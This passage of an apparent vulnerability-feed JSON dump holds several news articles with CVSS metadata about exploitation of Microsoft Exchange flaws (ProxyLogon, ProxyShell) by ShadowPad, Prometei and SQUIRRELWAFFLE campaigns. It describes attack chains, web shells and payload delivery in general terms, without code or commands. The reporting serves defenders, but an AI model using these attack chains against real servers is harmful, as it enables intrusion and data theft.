systems](<https://en.wikipedia.org/wiki/Building_automation>) of one of the victims,\" the company said. \"By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization.\"\n\n[ShadowPad](<https://thehackernews.com/2022/06/state-backed-hackers-using-ransomware.html>), which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been put to use by many Chinese espionage actors over the years. \n\nWhile its design allows users to remotely deploy additional plugins that can extend its functionality beyond covert data collection, what makes ShadowPad dangerous is the anti-forensic and anti-analysis techniques incorporated into the malware.\n\n\"During the attacks of the observed actor, the ShadowPad backdoor was downloaded onto the attacked computers under the guise of legitimate software,\" Kaspersky said. \"In many cases, the attacking group exploited a known vulnerability in MS Exchange, and entered the commands manually, indicating the highly targeted nature of their campaigns.\"\n\nEvidence suggests that intrusions mounted by the adversary began in March 2021, right around the time the [ProxyLogon vulnerabilities](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) in Exchange Servers became public knowledge. Some of the targets are said to have been breached by exploiting [CVE-2021-26855](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), a server-side request forgery (SSRF) vulnerability in the mail server.\n\nBesides deploying ShadowPad as \"mscoree.dll,\" an authentic Microsoft .NET Framework component, the attacks also involved the use of Cobalt Strike, a PlugX variant called [THOR](<https://thehackernews.com/2021/07/chinese-hackers-implant-plugx-variant.html>), and web shells for remote access.\n\nAlthough the final goals of the campaign remain unknown, the attackers are believed to be interested in long-term intelligence gathering.\n\n\"Building automation systems are rare targets for advanced threat actors,\" Kaspersky ICS CERT researcher Kirill Kruglov said. \"However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T11:30:00", "type": "thn", "title": "APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-29T03:13:37", "id": "THN:97FD375C23B4E7C3F13B9F3907873671", "href": "https://thehackernews.com/2022/06/apt-hackers-targeting-industrial.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LnAVswTXLc0/YECXmVTkFHI/AAAAAAAAB8M/VcsyTjTU0j85SwVjVTnc-hf3yFwUgogTgCLcBGAsYHQ/s0/cisa.jpg>)\n\nFollowing Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [issued](<https://cyber.dhs.gov/ed/21-02/>) an emergency directive warning of \"[active exploitation](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>)\" of the vulnerabilities.\n\nThe alert comes on the heels of Microsoft's [disclosure](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the [second time in four months](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors.\n\nWhile the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET [said](<https://twitter.com/ESETresearch/status/1366862946488451088>) it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East.\n\n[](<https://thehackernews.com/images/-TmA9t5dn7V8/YECZLOHV3DI/AAAAAAAAB8U/oGFCJ8b-FuE0teg_Vh5Chc3yvuQ70JNdQCLcBGAsYHQ/s0/hacking.jpg>)\n\nResearchers at Huntress Labs have also sounded the alarm about mass exploitation of Exchange servers, noting that over 350 web shells have been discovered across approximately 2,000 vulnerable servers.\n\n\"Among the vulnerable servers, we also found over 350 web shells \u2014 some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors,\" Huntress senior security researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers>). \"These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products.\"\n\nThe latest development indicates a much larger spread that extends beyond the \"limited and targeted\" attacks reported by Microsoft earlier this week.\n\nIt's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat. \n\nStrongly urging organizations to apply the patches as soon as possible, the agency cited the \"likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T08:26:00", "type": "thn", "title": "CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-05T06:35:30", "id": "THN:A73831555CB04403ED3302C1DDC239B1", "href": "https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:03", "description": "[](<https://thehackernews.com/images/-zhQ48QulMdk/YEoxFcQGtGI/AAAAAAAACA4/814m_r5DKVkVs6zM_Hl9_2EeOlHMeXvTgCLcBGAsYHQ/s0/proxylogon-poc-exploit.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals.\n\n\"CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack,\" the agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server>). \"Adversaries may also sell access to compromised networks on the dark web.\"\n\nThe attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors.\n\nTens of thousands of entities, including the [European Banking Authority](<https://thehackernews.com/2021/03/microsoft-exchange-hackers-also.html>) and the [Norwegian Parliament](<https://www.reuters.com/article/us-norway-cyber/norway-parliament-sustains-fresh-cyber-attack-idUSKBN2B21TX>), are believed to have been breached to install a web-based backdoor called the [China Chopper web shell](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>) that grants the attackers the ability to plunder email inboxes and remotely access the target systems.\n\nThe development comes in light of the [rapid expansion](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as \"limited and targeted\" into an indiscriminate mass exploitation campaign.\n\nWhile there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller.\n\n### From RCE to Web Shells to Implants\n\nOn March 2, 2021, [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) publicly disclosed the detection of [multiple zero-day exploits](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021.\n\n[](<https://thehackernews.com/images/-5BlLSFX3zpg/YEosmvOx0eI/AAAAAAAACAo/nZ_vd-Gp5t0YKLVuZ3PO1-zu6tpT_hqRQCLcBGAsYHQ/s0/poc.jpg>)\n\nSuccessful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.\n\nAlthough Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday [said](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>) it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers.\n\nApart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, \"Opera\" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes.\n\nNo conclusive evidence has emerged so far connecting the campaign to China, but DomainTools' Senior Security Researcher Joe Slowik [noted](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>) that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation activity.\n\n\"It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack,\" Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/china-chopper-webshell/>).\n\nIn one cluster tracked as \"[Sapphire Pigeon](<https://redcanary.com/blog/microsoft-exchange-attacks/#clusters>)\" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity.\n\nAccording to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) [reported](<https://csirt.divd.nl/2021/03/08/Exchange-vulnerabilities-update/>) Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities.\n\n[](<https://thehackernews.com/images/-f2zgTwFBKWw/YEos7G5zJ-I/AAAAAAAACAw/m0hGtK4suCkDQoGBl9drBf63JXBQA7YfQCLcBGAsYHQ/s0/cyberattack-timeline.jpg>)\n\nTroublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns.\n\n\"The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse,\" said ESET researcher Matthieu Faou. \"Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\"\n\nAside from installing the web shell, other behaviors related to or inspired by Hafnium activity include [conducting reconnaissance](<https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3>) in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery.\n\n### Public Proof-of-Concept Available\n\nComplicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days.\n\n[](<https://thehackernews.com/images/-jZ4Km1P3Jic/YEoruswQHKI/AAAAAAAACAg/3mKbCQaUVkA1x98uEBtKA4hueS2e9ZqRgCLcBGAsYHQ/s0/proxylogon-exploit.jpg>)\n\n\"I've confirmed there is a public PoC floating around for the full RCE exploit chain,\" security researcher Marcus Hutchins [said](<https://twitter.com/MalwareTechBlog/status/1369729825104007169>). \"It has a couple bugs but with some fixes I was able to get shell on my test box.\"\n\nAlso accompanying the PoC's release is a detailed [technical write-up](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions.\n\nWhile the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks.\n\nAs the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27.\n\nCybersecurity journalist Brian Krebs [attributed](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) this to the prospect that \"different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped.\"\n\n\"The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches,\" Slowik [said](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \"However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T15:04:00", "type": "thn", "title": "ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-15T08:52:31", "id": "THN:ABF9BC598B143E7226083FE7D2952CAE", "href": "https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. \n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": "THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution 